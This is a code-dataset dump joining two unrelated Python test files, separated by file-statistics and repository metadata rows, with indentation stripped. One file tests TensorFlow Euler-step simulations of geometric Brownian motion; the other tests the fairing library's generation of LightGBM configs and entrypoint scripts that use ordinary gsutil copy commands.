self.assertEqual(next_max_bis_eval.shape, (num_samples,))
self.assertAllClose(next_states_eval, next_states_bis_eval)
self.assertAllClose(next_max_eval, next_max_bis_eval)
def test_gbm_euler_step_running_max_bridge_changes_with_t(self):
drift = 0.2
vol = 0.1
t_0 = 0.2
dt = 0.01
num_samples = 8
t_1 = t_0 + dt
states_and_max = [tf.ones([num_samples])] * 2
next_states_and_max_0 = dynamics.gbm_euler_step_running_max(
states_and_max, drift, vol, t_0, dt, simulate_bridge=True)
next_states_and_max_1 = dynamics.gbm_euler_step_running_max(
states_and_max, drift, vol, t_1, dt, simulate_bridge=True)
with self.session() as session:
next_states_and_max_0_eval, next_states_and_max_1_eval = session.run(
(next_states_and_max_0, next_states_and_max_1))
next_states_0_eval, next_max_0_eval = next_states_and_max_0_eval
next_states_1_eval, next_max_1_eval = next_states_and_max_1_eval
self.assertEqual(next_states_0_eval.shape, (num_samples,))
self.assertEqual(next_states_1_eval.shape, (num_samples,))
self.assertEqual(next_max_0_eval.shape, (num_samples,))
self.assertEqual(next_max_1_eval.shape, (num_samples,))
# The step is a bijection w.r.t. dw_t, all terms should be different.
# However there is no such guarantee for the running maxima.
self.assertAllDistinct(next_states_0_eval, next_states_1_eval)
def test_gbm_euler_step_running_max_bridge_changes_with_key(self):
drift = 0.2
vol = 0.1
t = 0.2
dt = 0.01
num_samples = 8
key_0 = 74
key_1 = 75
states_and_max = [tf.ones([num_samples])] * 2
next_states_and_max_0 = dynamics.gbm_euler_step_running_max(
states_and_max, drift, vol, t, dt, key=key_0, simulate_bridge=True)
next_states_and_max_1 = dynamics.gbm_euler_step_running_max(
states_and_max, drift, vol, t, dt, key=key_1, simulate_bridge=True)
with self.session() as session:
next_states_and_max_0_eval, next_states_and_max_1_eval = session.run(
(next_states_and_max_0, next_states_and_max_1))
next_states_0_eval, next_max_0_eval = next_states_and_max_0_eval
next_states_1_eval, next_max_1_eval = next_states_and_max_1_eval
self.assertEqual(next_states_0_eval.shape, (num_samples,))
self.assertEqual(next_states_1_eval.shape, (num_samples,))
self.assertEqual(next_max_0_eval.shape, (num_samples,))
self.assertEqual(next_max_1_eval.shape, (num_samples,))
# The step is a bijection w.r.t. dw_t, all terms should be different.
# However there is no such guarantee for the running maxima.
self.assertAllDistinct(next_states_0_eval, next_states_1_eval)
def test_gbm_euler_step_running_sum_output_is_correct(self):
np.random.seed(0)
drift = 0.2
vol = 0.1
t = 0.0
dt = 0.01
num_samples = 8
initial_states = np.ones([num_samples], dtype=np.float32)
states_and_sums = [tf.constant(initial_states)] * 2
eps_t = np.ndarray.astype(
np.random.normal(size=[num_samples]), dtype=np.float32)
(next_states, next_sums) = dynamics.gbm_euler_step_running_sum(
states_and_sums, drift, vol, t, dt, random_normal_op=lambda: eps_t)
with self.session() as session:
(next_states_eval, next_sums_eval) = session.run((next_states, next_sums))
self.assertEqual(next_states_eval.shape, (num_samples,))
self.assertEqual(next_sums_eval.shape, (num_samples,))
expected_next_states = initial_states * (1.0 + drift * dt +
vol * eps_t * np.sqrt(dt))
expected_next_sums = expected_next_states + initial_states
# Here the maximum discrepancy is 1.17e-7 due to differences in
# numerical implementations between tf and np so we set delta to 1.2e-7.
self.assertAllClose(next_states_eval, expected_next_states, atol=1.2e-7)
self.assertAllClose(next_sums_eval, expected_next_sums, atol=1.2e-7)
def test_gbm_euler_step_running_sum_expects_static_shape_left_member(self):
drift = 0.2
vol = 0.1
t = 0.2
dt = 0.01
num_samples = 8
states_and_sums = [
tf.placeholder(dtype=tf.float32, shape=[None]), tf.ones([num_samples])]
with self.assertRaises(ValueError):
dynamics.gbm_euler_step_running_sum(states_and_sums, drift, vol, t, dt)
def test_gbm_euler_step_running_sum_expects_static_shape_right_member(self):
drift = 0.2
vol = 0.1
t = 0.2
dt = 0.01
num_samples = 8
states_and_sums = [
tf.ones([num_samples]), tf.placeholder(dtype=tf.float32, shape=[None])]
with self.assertRaises(ValueError):
dynamics.gbm_euler_step_running_sum(states_and_sums, drift, vol, t, dt)
def test_gbm_euler_step_running_sum_expects_static_shape_both_members(self):
drift = 0.2
vol = 0.1
t = 0.2
dt = 0.01
states_and_sums = [
tf.placeholder(dtype=tf.float32, shape=[None]),
tf.placeholder(dtype=tf.float32, shape=[None])]
with self.assertRaises(ValueError):
dynamics.gbm_euler_step_running_sum(states_and_sums, drift, vol, t, dt)
def test_gbm_euler_step_running_sum_is_deterministic(self):
drift = 0.2
vol = 0.1
t = 0.2
dt = 0.01
num_samples = 8
key = 1337
states_and_sums = [tf.ones([num_samples])] * 2
eps_t = contrib_stateless.stateless_random_normal(
shape=[num_samples], seed=[key, int(t / dt)])
next_states_and_sums = dynamics.gbm_euler_step_running_sum(
states_and_sums, drift, vol, t, dt, random_normal_op=lambda: eps_t)
next_states_and_sums_bis = dynamics.gbm_euler_step_running_sum(
states_and_sums, drift, vol, t, dt, key=key)
with self.session() as session:
next_states_and_sums_eval, next_states_and_sums_bis_eval = session.run(
(next_states_and_sums, next_states_and_sums_bis))
next_states_eval, next_sums_eval = next_states_and_sums_eval
next_states_bis_eval, next_sums_bis_eval = next_states_and_sums_bis_eval
self.assertEqual(next_states_eval.shape, (num_samples,))
self.assertEqual(next_states_bis_eval.shape, (num_samples,))
self.assertEqual(next_sums_eval.shape, (num_samples,))
self.assertEqual(next_sums_bis_eval.shape, (num_samples,))
self.assertAllClose(next_states_eval, next_states_bis_eval)
self.assertAllClose(next_sums_eval, next_sums_bis_eval)
def test_gbm_euler_step_running_sum_changes_with_t(self):
drift = 0.2
vol = 0.1
t_0 = 0.2
dt = 0.01
num_samples = 8
t_1 = t_0 + dt
states_and_sums = [tf.ones([num_samples])] * 2
next_states_and_sums_0 = dynamics.gbm_euler_step_running_sum(
states_and_sums, drift, vol, t_0, dt)
next_states_and_sums_1 = dynamics.gbm_euler_step_running_sum(
states_and_sums, drift, vol, t_1, dt)
with self.session() as session:
next_states_and_sums_0_eval, next_states_and_sums_1_eval = session.run(
(next_states_and_sums_0, next_states_and_sums_1))
next_states_0_eval, next_sums_0_eval = next_states_and_sums_0_eval
next_states_1_eval, next_sums_1_eval = next_states_and_sums_1_eval
self.assertEqual(next_states_0_eval.shape, (num_samples,))
self.assertEqual(next_states_1_eval.shape, (num_samples,))
self.assertEqual(next_sums_0_eval.shape, (num_samples,))
self.assertEqual(next_sums_1_eval.shape, (num_samples,))
# The step is a bijection w.r.t. dw_t, all terms should be different.
# However there is no such guarantee for the running maxima.
self.assertAllDistinct(next_states_0_eval, next_states_1_eval)
def test_gbm_euler_step_running_sum_changes_with_key(self):
drift = 0.2
vol = 0.1
t = 0.2
dt = 0.01
num_samples = 8
key_0 = 74
key_1 = 75
states_and_sums = [tf.ones([num_samples])] * 2
next_states_and_sums_0 = dynamics.gbm_euler_step_running_sum(
states_and_sums, drift, vol, t, dt, key=key_0)
next_states_and_sums_1 = dynamics.gbm_euler_step_running_sum(
states_and_sums, drift, vol, t, dt, key=key_1)
with self.session() as session:
next_states_and_sums_0_eval, next_states_and_sums_1_eval = session.run(
(next_states_and_sums_0, next_states_and_sums_1))
next_states_0_eval, next_sums_0_eval = next_states_and_sums_0_eval
next_states_1_eval, next_sums_1_eval = next_states_and_sums_1_eval
self.assertEqual(next_states_0_eval.shape, (num_samples,))
self.assertEqual(next_states_1_eval.shape, (num_samples,))
self.assertEqual(next_sums_0_eval.shape, (num_samples,))
self.assertEqual(next_sums_1_eval.shape, (num_samples,))
# The step is a bijection w.r.t. dw_t, all terms should be different.
# However there is no such guarantee for the running maxima.
self.assertAllDistinct(next_states_0_eval, next_states_1_eval)
def test_gbm_euler_step_nd_output_is_correct(self):
np.random.seed(0)
drift = np.asarray([0.1, 0.3, -0.05], dtype=np.float32)
vol_matrix = 0.2 * np.asarray(
[[1.5, 0.2, 0.3], [0.2, 1.1, -0.1], [0.3, -0.1, 0.8]], dtype=np.float32)
t = 0.0
dt = 0.01
num_samples = 8
num_dims = drift.shape[0]
states = tf.ones([num_samples, num_dims])
eps_t = np.ndarray.astype(
np.random.normal(size=[num_samples, num_dims]), dtype=np.float32)
next_states = dynamics.gbm_euler_step_nd(
states, drift, vol_matrix, t, dt, random_normal_op=lambda: eps_t)
with self.session() as session:
next_states_eval = session.run(next_states)
self.assertEqual(next_states_eval.shape, (num_samples, num_dims))
for i in range(num_samples):
self.assertAllClose(
next_states_eval[i],
np.ones([num_dims], dtype=np.float32) *
(1.0 + drift * dt + np.matmul(vol_matrix, eps_t[i] * np.sqrt(dt))))
def test_gbm_euler_step_nd_expects_static_shape(self):
drift = np.asarray([0.1, 0.3, -0.05], dtype=np.float32)
vol_matrix = 0.2 * np.asarray(
[[1.5, 0.2, 0.3], [0.2, 1.1, -0.1], [0.3, -0.1, 0.8]], dtype=np.float32)
t = 0.0
dt = 0.01
num_dims = drift.shape[0]
states = tf.placeholder(dtype=tf.float32, shape=[None, num_dims])
with self.assertRaises(ValueError):
dynamics.gbm_euler_step_nd(states, drift, vol_matrix, t, dt)
def test_gbm_euler_step_nd_is_deterministic(self):
drift = np.asarray([0.1, 0.3, -0.05], dtype=np.float32)
vol_matrix = 0.2 * np.asarray(
[[1.5, 0.2, 0.3], [0.2, 1.1, -0.1], [0.3, -0.1, 0.8]], dtype=np.float32)
t = 0.3
dt = 0.01
num_samples = 8
num_dims = drift.shape[0]
key = 42
states = tf.ones([num_samples, num_dims])
eps_t = contrib_stateless.stateless_random_normal(
shape=[num_samples, num_dims], seed=[key, int(t / dt)])
next_states = dynamics.gbm_euler_step_nd(
states, drift, vol_matrix, t, dt, random_normal_op=lambda: eps_t)
next_states_bis = dynamics.gbm_euler_step_nd(
states, drift, vol_matrix, t, dt, key=key)
with self.session() as session:
next_states_eval, next_states_bis_eval = session.run((next_states,
next_states_bis))
self.assertEqual(next_states_eval.shape, (num_samples, num_dims))
self.assertEqual(next_states_bis_eval.shape, (num_samples, num_dims))
self.assertAllClose(next_states_eval, next_states_bis_eval)
def test_gbm_euler_step_nd_output_changes_with_t(self):
drift = np.asarray([0.1, 0.3, -0.05], dtype=np.float32)
vol_matrix = 0.2 * np.asarray(
[[1.5, 0.2, 0.3], [0.2, 1.1, -0.1], [0.3, -0.1, 0.8]], dtype=np.float32)
t_0 = 0.3
dt = 0.01
num_samples = 8
num_dims = drift.shape[0]
t_1 = t_0 + dt
states = tf.ones([num_samples, num_dims])
next_states_0 = dynamics.gbm_euler_step_nd(states, drift, vol_matrix, t_0,
dt)
next_states_1 = dynamics.gbm_euler_step_nd(states, drift, vol_matrix, t_1,
dt)
with self.session() as session:
next_states_0_eval, next_states_1_eval = session.run((next_states_0,
next_states_1))
self.assertEqual(next_states_0_eval.shape, (num_samples, num_dims))
self.assertEqual(next_states_1_eval.shape, (num_samples, num_dims))
# The step is a bijection w.r.t. dw_t, all terms should be different.
self.assertAllDistinct(next_states_0_eval, next_states_1_eval)
def test_gbm_euler_step_nd_output_changes_with_key(self):
drift = np.asarray([0.1, 0.3, -0.05], dtype=np.float32)
vol_matrix = 0.2 * np.asarray(
[[1.5, 0.2, 0.3], [0.2, 1.1, -0.1], [0.3, -0.1, 0.8]], dtype=np.float32)
t = 0.3
dt = 0.01
num_samples = 8
num_dims = drift.shape[0]
key_0 = 42
key_1 = 77
states = tf.ones([num_samples, num_dims])
next_states_0 = dynamics.gbm_euler_step_nd(
states, drift, vol_matrix, t, dt, key=key_0)
next_states_1 = dynamics.gbm_euler_step_nd(
states, drift, vol_matrix, t, dt, key=key_1)
with self.session() as session:
next_states_0_eval, next_states_1_eval = session.run((next_states_0,
next_states_1))
self.assertEqual(next_states_0_eval.shape, (num_samples, num_dims))
self.assertEqual(next_states_1_eval.shape, (num_samples, num_dims))
# The step is a bijection w.r.t. dw_t, all terms should be different.
self.assertAllDistinct(next_states_0_eval, next_states_1_eval)
def test_gbm_log_euler_step_output_is_correct(self):
np.random.seed(0)
drift = 0.2
vol = 0.1
t = 0.0
dt = 0.01
num_samples = 8
log_states = tf.zeros([num_samples])
eps_t = np.ndarray.astype(
np.random.normal(size=[num_samples]), dtype=np.float32)
next_log_states = dynamics.gbm_log_euler_step(
log_states, drift, vol, t, dt, random_normal_op=lambda: eps_t)
with self.session() as session:
next_log_states_eval = session.run(next_log_states)
self.assertEqual(next_log_states_eval.shape, (num_samples,))
self.assertAllClose(
next_log_states_eval,
np.zeros([num_samples], dtype=np.float32) +
(drift - 0.5 * (vol**2)) * dt + vol * eps_t * np.sqrt(dt))
def test_gbm_log_euler_step_expects_static_shape(self):
drift = 0.2
vol = 0.1
t = 0.0
dt = 0.01
log_states = tf.placeholder(dtype=tf.float32, shape=[None])
with self.assertRaises(ValueError):
dynamics.gbm_log_euler_step(log_states, drift, vol, t, dt)
def test_gbm_log_euler_step_is_deterministic(self):
drift = 0.2
vol = 0.1
t = 0.0
dt = 0.01
num_samples = 8
key = 13
log_states = tf.zeros([num_samples])
eps_t = contrib_stateless.stateless_random_normal(
shape=[num_samples], seed=[key, int(t / dt)])
next_log_states = dynamics.gbm_log_euler_step(
log_states, drift, vol, t, dt, random_normal_op=lambda: eps_t)
next_log_states_bis = dynamics.gbm_log_euler_step(
log_states, drift, vol, t, dt, key=key)
with self.session() as session:
next_log_states_eval, next_log_states_bis_eval = session.run(
(next_log_states, next_log_states_bis))
self.assertEqual(next_log_states_eval.shape, (num_samples,))
self.assertEqual(next_log_states_bis_eval.shape, (num_samples,))
self.assertAllClose(next_log_states_eval, next_log_states_bis_eval)
def test_gbm_log_euler_step_output_changes_with_t(self):
drift = 0.2
vol = 0.1
t_0 = 0.0
dt = 0.01
num_samples = 8
t_1 = t_0 + dt
log_states = tf.zeros([num_samples])
next_log_states_0 = dynamics.gbm_log_euler_step(log_states, drift, vol, t_0,
dt)
next_log_states_1 = dynamics.gbm_log_euler_step(log_states, drift, vol, t_1,
dt)
with self.session() as session:
next_log_states_0_eval, next_log_states_1_eval = session.run(
(next_log_states_0, next_log_states_1))
self.assertEqual(next_log_states_0_eval.shape, (num_samples,))
self.assertEqual(next_log_states_1_eval.shape, (num_samples,))
# The step is a bijection w.r.t. dw_t, all terms should be different.
self.assertAllDistinct(next_log_states_0_eval, next_log_states_1_eval)
def test_gbm_log_euler_step_output_changes_with_key(self):
drift = 0.2
vol = 0.1
t = 0.0
dt = 0.01
num_samples = 8
key_0 = 1137
key_1 = 0
log_states = tf.zeros([num_samples])
next_log_states_0 = dynamics.gbm_log_euler_step(
log_states, drift, vol, t, dt, key=key_0)
next_log_states_1 = dynamics.gbm_log_euler_step(
log_states, drift, vol, t, dt, key=key_1)
with self.session() as session:
next_log_states_0_eval, next_log_states_1_eval = session.run(
(next_log_states_0, next_log_states_1))
self.assertEqual(next_log_states_0_eval.shape, (num_samples,))
self.assertEqual(next_log_states_1_eval.shape, (num_samples,))
# The step is a bijection w.r.t. dw_t, all terms should be different.
self.assertAllDistinct(next_log_states_0_eval, next_log_states_1_eval)
def test_gbm_log_euler_step_nd_output_is_correct(self):
drift = np.asarray([0.1, 0.3, -0.05], dtype=np.float32)
vol_matrix = 0.2 * np.asarray(
[[1.5, 0.2, 0.3], [0.2, 1.1, -0.1], [0.3, -0.1, 0.8]], dtype=np.float32)
dt = 0.01
t = 0.0
num_samples = 8
num_dims = drift.shape[0]
log_states = tf.zeros([num_samples, num_dims])
eps_t = np.ndarray.astype(
np.random.normal(size=[num_samples, num_dims]), dtype=np.float32)
next_log_states = dynamics.gbm_log_euler_step_nd(
log_states, drift, vol_matrix, t, dt, random_normal_op=lambda: eps_t)
with self.session() as session:
next_log_states_eval = session.run(next_log_states)
self.assertEqual(next_log_states_eval.shape, (num_samples, num_dims))
for i in range(num_samples):
self.assertAllClose(
next_log_states_eval[i],
np.zeros([num_dims], dtype=np.float32) +
(drift - 0.5 * np.sum(vol_matrix**2, axis=0)) * dt +
np.matmul(vol_matrix, eps_t[i] * np.sqrt(dt)))
def test_gbm_log_euler_step_nd_expects_static_shape(self):
drift = np.asarray([0.1, 0.3, -0.05], dtype=np.float32)
vol_matrix = 0.2 * np.asarray(
[[1.5, 0.2, 0.3], [0.2, 1.1, -0.1], [0.3, -0.1, 0.8]], dtype=np.float32)
dt = 0.01
t = 0.0
num_dims = drift.shape[0]
log_states = tf.placeholder(dtype=tf.float32, shape=[None, num_dims])
with self.assertRaises(ValueError):
dynamics.gbm_log_euler_step_nd(log_states, drift, vol_matrix, t, dt)
def test_gbm_log_euler_step_nd_is_deterministic(self):
drift = np.asarray([0.1, 0.3, -0.05], dtype=np.float32)
vol_matrix = 0.2 * np.asarray(
[[1.5, 0.2, 0.3], [0.2, 1.1, -0.1], [0.3, -0.1, 0.8]], dtype=np.float32)
dt = 0.01
t = 0.0
num_samples = 8
num_dims = drift.shape[0]
key = 128
log_states = tf.zeros([num_samples, num_dims])
eps_t = contrib_stateless.stateless_random_normal(
shape=[num_samples, num_dims], seed=[key, int(t / dt)])
next_log_states = dynamics.gbm_log_euler_step_nd(
log_states, drift, vol_matrix, t, dt, random_normal_op=lambda: eps_t)
next_log_states_bis = dynamics.gbm_log_euler_step_nd(
log_states, drift, vol_matrix, t, dt, key=key)
with self.session() as session:
next_log_states_eval, next_log_states_bis_eval = session.run(
(next_log_states, next_log_states_bis))
self.assertEqual(next_log_states_eval.shape, (num_samples, num_dims))
self.assertEqual(next_log_states_bis_eval.shape, (num_samples, num_dims))
self.assertAllClose(next_log_states_eval, next_log_states_bis_eval)
def test_gbm_log_euler_step_nd_output_changes_with_t(self):
drift = np.asarray([0.1, 0.3, -0.05], dtype=np.float32)
vol_matrix = 0.2 * np.asarray(
[[1.5, 0.2, 0.3], [0.2, 1.1, -0.1], [0.3, -0.1, 0.8]], dtype=np.float32)
dt = 0.01
t_0 = 0.0
num_samples = 8
num_dims = drift.shape[0]
t_1 = t_0 + dt
log_states = tf.zeros([num_samples, num_dims])
next_log_states_0 = dynamics.gbm_log_euler_step_nd(log_states, drift,
vol_matrix, t_0, dt)
next_log_states_1 = dynamics.gbm_log_euler_step_nd(log_states, drift,
vol_matrix, t_1, dt)
with self.session() as session:
next_log_states_0_eval, next_log_states_1_eval = session.run(
(next_log_states_0, next_log_states_1))
self.assertEqual(next_log_states_0_eval.shape, (num_samples, num_dims))
self.assertEqual(next_log_states_1_eval.shape, (num_samples, num_dims))
# The step is a bijection w.r.t. dw_t, all terms should be different.
self.assertAllDistinct(next_log_states_0_eval, next_log_states_1_eval)
def test_gbm_log_euler_step_nd_output_changes_with_key(self):
drift = np.asarray([0.1, 0.3, -0.05], dtype=np.float32)
vol_matrix = 0.2 * np.asarray(
[[1.5, 0.2, 0.3], [0.2, 1.1, -0.1], [0.3, -0.1, 0.8]], dtype=np.float32)
dt = 0.01
t = 0.0
num_samples = 8
num_dims = drift.shape[0]
key_0 = 50
key_1 = 99
log_states = tf.zeros([num_samples, num_dims])
next_log_states_0 = dynamics.gbm_log_euler_step_nd(
log_states, drift, vol_matrix, t, dt, key=key_0)
next_log_states_1 = dynamics.gbm_log_euler_step_nd(
log_states, drift, vol_matrix, t, dt, key=key_1)
with self.session() as session:
next_log_states_0_eval, next_log_states_1_eval = session.run(
(next_log_states_0, next_log_states_1))
self.assertEqual(next_log_states_0_eval.shape, (num_samples, num_dims))
self.assertEqual(next_log_states_1_eval.shape, (num_samples, num_dims))
# The step is a bijection w.r.t. dw_t, all terms should be different.
self.assertAllDistinct(next_log_states_0_eval, next_log_states_1_eval)
@tf.test.mock.patch.object(tf.random, 'stateless_normal')
def test_random_normal(self, mock_stateless_random_normal):
_ = dynamics.random_normal(shape=[3, 1], i=41 / 5, key=9)
_, call_args = mock_stateless_random_normal.call_args
assert_ops = [
tf.assert_equal(tf.stack([9, 8]), call_args['seed']),
tf.assert_equal([3, 1], call_args['shape'])
]
with self.session() as sess:
sess.run(assert_ops)
if __name__ == '__main__':
tf.test.main()
| 35.630474
| 80
| 0.688945
| 6,170
| 39,051
| 3.996434
| 0.040681
| 0.089221
| 0.046232
| 0.052397
| 0.940303
| 0.925947
| 0.917065
| 0.908022
| 0.887825
| 0.877606
| 0
| 0.037133
| 0.206935
| 39,051
| 1,095
| 81
| 35.663014
| 0.759057
| 0.062764
| 0
| 0.761491
| 0
| 0
| 0.000903
| 0
| 0
| 0
| 0
| 0
| 0.152795
| 1
| 0.054658
| false
| 0
| 0.008696
| 0
| 0.064596
| 0.001242
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
48e3364a00913ed743c1230b205d3fcedabc0cd2
| 8,754
|
py
|
Python
|
tests/unit/frameworks/test_lightgbm.py
|
Jeffwan/fairing
|
c83ff8653a0744de6cfb65bffe584dc892a074da
|
[
"Apache-2.0"
] | 2
|
2019-06-27T18:17:06.000Z
|
2019-08-14T12:29:32.000Z
|
tests/unit/frameworks/test_lightgbm.py
|
Jeffwan/fairing
|
c83ff8653a0744de6cfb65bffe584dc892a074da
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/frameworks/test_lightgbm.py
|
Jeffwan/fairing
|
c83ff8653a0744de6cfb65bffe584dc892a074da
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from fairing.frameworks import lightgbm
import fairing
import posixpath
from fairing.constants import constants
from unittest.mock import patch
EXAMPLE_CONFIG = {
'task': 'train',
'boosting_type': 'gbdt',
'objective': 'regression',
"n_estimators": 10,
"is_training_metric": True,
"valid_data": "gs://lightgbm-test/regression.test",
"train_data": "gs://lightgbm-test/regression.train",
'verbose': 1,
"model_output": "gs://lightgbm-test/model.txt"
}
EXMAPLE_CONFIG_FILE_NAME = "/config-file.conf"
def test_context_files_list():
with patch('fairing.cloud.storage.GCSStorage.exists'):
output_map = lightgbm.generate_context_files(
EXAMPLE_CONFIG, EXMAPLE_CONFIG_FILE_NAME, 1)
actual = list(output_map.values())
actual.sort()
expected = [
posixpath.join(constants.DEFAULT_DEST_PREFIX, 'config.conf.original'),
posixpath.join(constants.DEFAULT_DEST_PREFIX, 'config.conf'),
posixpath.join(constants.DEFAULT_DEST_PREFIX, 'entrypoint.sh'),
posixpath.join(constants.DEFAULT_DEST_PREFIX, 'utils.py')
]
expected.sort()
assert expected == actual
def test_context_files_list_dist():
with patch('fairing.cloud.storage.GCSStorage.exists'):
output_map = lightgbm.generate_context_files(
EXAMPLE_CONFIG, EXMAPLE_CONFIG_FILE_NAME, 2)
actual = list(output_map.values())
actual.sort()
expected = [
posixpath.join(constants.DEFAULT_DEST_PREFIX, 'config.conf.original'),
posixpath.join(constants.DEFAULT_DEST_PREFIX, 'config.conf'),
posixpath.join(constants.DEFAULT_DEST_PREFIX, 'entrypoint.sh'),
posixpath.join(constants.DEFAULT_DEST_PREFIX, 'lightgbm_dist_training_init.py'),
posixpath.join(constants.DEFAULT_DEST_PREFIX, 'utils.py')
]
expected.sort()
assert expected == actual
def test_entrypoint_content():
with patch('fairing.cloud.storage.GCSStorage.exists'):
output_map = lightgbm.generate_context_files(
EXAMPLE_CONFIG, EXMAPLE_CONFIG_FILE_NAME, 1)
entrypoint_file_in_docker = posixpath.join(constants.DEFAULT_DEST_PREFIX, 'entrypoint.sh')
entrypoint_file = None
for k, v in output_map.items():
if v == entrypoint_file_in_docker:
entrypoint_file = k
actual = open(entrypoint_file, "r").read()
expected = """#!/bin/sh
set -e
gsutil cp -r gs://lightgbm-test/regression.train.weight {0}/regression.train.weight
gsutil cp -r gs://lightgbm-test/regression.train {0}/regression.train
gsutil cp -r gs://lightgbm-test/regression.test {0}/regression.test
echo 'All files are copied!'
lightgbm config={0}/config.conf
gsutil cp -r {0}/model.txt gs://lightgbm-test/model.txt
""".format(posixpath.realpath(constants.DEFAULT_DEST_PREFIX))
print(actual)
assert expected == actual
def test_final_config():
with patch('fairing.cloud.storage.GCSStorage.exists'):
output_map = lightgbm.generate_context_files(
EXAMPLE_CONFIG, EXMAPLE_CONFIG_FILE_NAME, 1)
config_file_in_docker = posixpath.join(constants.DEFAULT_DEST_PREFIX, 'config.conf')
config_file_local = None
for k, v in output_map.items():
if v == config_file_in_docker:
config_file_local = k
actual = open(config_file_local, "r").read()
expected = """task=train
boosting_type=gbdt
objective=regression
n_estimators=10
is_training_metric=true
valid_data={0}/regression.test
train_data={0}/regression.train
verbose=1
model_output={0}/model.txt
""".format(posixpath.realpath(constants.DEFAULT_DEST_PREFIX))
print(actual)
assert expected == actual
def test_input_file_not_found():
with pytest.raises(RuntimeError) as excinfo:
with patch('fairing.cloud.storage.GCSStorage.exists', new=lambda x, y: False):
_ = lightgbm.generate_context_files(
EXAMPLE_CONFIG, EXMAPLE_CONFIG_FILE_NAME, 1)
err_msg = str(excinfo.value)
assert "Remote file " in err_msg and "does't exist" in err_msg
def test_entrypoint_content_no_weight_file():
with patch('fairing.cloud.storage.GCSStorage.exists', new=lambda bucket,path: not path.endswith(".weight")):
output_map = lightgbm.generate_context_files(
EXAMPLE_CONFIG, EXMAPLE_CONFIG_FILE_NAME, 1)
entrypoint_file_in_docker = posixpath.join(constants.DEFAULT_DEST_PREFIX, 'entrypoint.sh')
entrypoint_file = None
for k, v in output_map.items():
if v == entrypoint_file_in_docker:
entrypoint_file = k
actual = open(entrypoint_file, "r").read()
expected = """#!/bin/sh
set -e
gsutil cp -r gs://lightgbm-test/regression.train {0}/regression.train
gsutil cp -r gs://lightgbm-test/regression.test {0}/regression.test
echo 'All files are copied!'
lightgbm config={0}/config.conf
gsutil cp -r {0}/model.txt gs://lightgbm-test/model.txt
""".format(posixpath.realpath(constants.DEFAULT_DEST_PREFIX))
print(actual)
assert expected == actual
def test_entrypoint_content_dist_data_parallel():
config = EXAMPLE_CONFIG.copy()
config["tree_learner"] = "data"
config["train_data"] = ",".join(["gs://lightgbm-test/regression.train1",
"gs://lightgbm-test/regression.train2"])
with patch('fairing.cloud.storage.GCSStorage.exists'):
output_map = lightgbm.generate_context_files(
config, EXMAPLE_CONFIG_FILE_NAME, 2)
entrypoint_file_in_docker = posixpath.join(constants.DEFAULT_DEST_PREFIX, 'entrypoint.sh')
entrypoint_file = None
for k, v in output_map.items():
if v == entrypoint_file_in_docker:
entrypoint_file = k
actual = open(entrypoint_file, "r").read()
expected = """#!/bin/sh
set -e
RANK=`python lightgbm_dist_training_init.py config.conf mlist.txt`
case $RANK in
0)
gsutil cp -r gs://lightgbm-test/regression.train1 /app/train_data
gsutil cp -r gs://lightgbm-test/regression.train1.weight /app/train_data.weight
;;
1)
gsutil cp -r gs://lightgbm-test/regression.train2 /app/train_data
gsutil cp -r gs://lightgbm-test/regression.train2.weight /app/train_data.weight
;;
esac
gsutil cp -r gs://lightgbm-test/regression.test {0}/regression.test
echo 'All files are copied!'
lightgbm config={0}/config.conf
gsutil cp -r {0}/model.txt gs://lightgbm-test/model.txt
""".format(posixpath.realpath(constants.DEFAULT_DEST_PREFIX))
print(actual)
assert expected == actual
def test_entrypoint_content_dist_data_parallel_no_weight_files():
config = EXAMPLE_CONFIG.copy()
config["tree_learner"] = "data"
config["train_data"] = ",".join(["gs://lightgbm-test/regression.train1",
"gs://lightgbm-test/regression.train2"])
with patch('fairing.cloud.storage.GCSStorage.exists', new=lambda bucket,path: not path.endswith(".weight")):
output_map = lightgbm.generate_context_files(
config, EXMAPLE_CONFIG_FILE_NAME, 2)
entrypoint_file_in_docker = posixpath.join(constants.DEFAULT_DEST_PREFIX, 'entrypoint.sh')
entrypoint_file = None
for k, v in output_map.items():
if v == entrypoint_file_in_docker:
entrypoint_file = k
actual = open(entrypoint_file, "r").read()
expected = """#!/bin/sh
set -e
RANK=`python lightgbm_dist_training_init.py config.conf mlist.txt`
case $RANK in
0)
gsutil cp -r gs://lightgbm-test/regression.train1 /app/train_data
;;
1)
gsutil cp -r gs://lightgbm-test/regression.train2 /app/train_data
;;
esac
gsutil cp -r gs://lightgbm-test/regression.test {0}/regression.test
echo 'All files are copied!'
lightgbm config={0}/config.conf
gsutil cp -r {0}/model.txt gs://lightgbm-test/model.txt
""".format(posixpath.realpath(constants.DEFAULT_DEST_PREFIX))
print(actual)
assert expected == actual
def test_dist_training_misconfigured_input_files():
config = EXAMPLE_CONFIG.copy()
config["tree_learner"] = "feature"
config["train_data"] = ",".join(["gs://lightgbm-test/regression.train1",
"gs://lightgbm-test/regression.train2"])
with pytest.raises(RuntimeError) as excinfo:
lightgbm.generate_context_files(config, EXMAPLE_CONFIG_FILE_NAME, 2)
assert "train_data has more than one file specified" in str(excinfo.value)
def test_dist_training_misconfigured_num_machines():
config = EXAMPLE_CONFIG.copy()
config["tree_learner"] = "data"
config["train_data"] = ",".join(["gs://lightgbm-test/regression.train1",
"gs://lightgbm-test/regression.train2"])
with pytest.raises(RuntimeError) as excinfo:
lightgbm.generate_context_files(config, EXMAPLE_CONFIG_FILE_NAME, 3)
assert "field in the config should be equal to the num_machines=3 config value." in str(excinfo.value)
| 40.716279
| 112
| 0.711332
| 1,153
| 8,754
| 5.183868
| 0.129228
| 0.046846
| 0.065585
| 0.092354
| 0.891417
| 0.851598
| 0.833863
| 0.831019
| 0.818973
| 0.801573
| 0
| 0.00725
| 0.164953
| 8,754
| 215
| 113
| 40.716279
| 0.810397
| 0
| 0
| 0.708543
| 0
| 0.015075
| 0.360937
| 0.188007
| 0
| 0
| 0
| 0
| 0.050251
| 1
| 0.050251
| false
| 0
| 0.030151
| 0
| 0.080402
| 0.025126
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
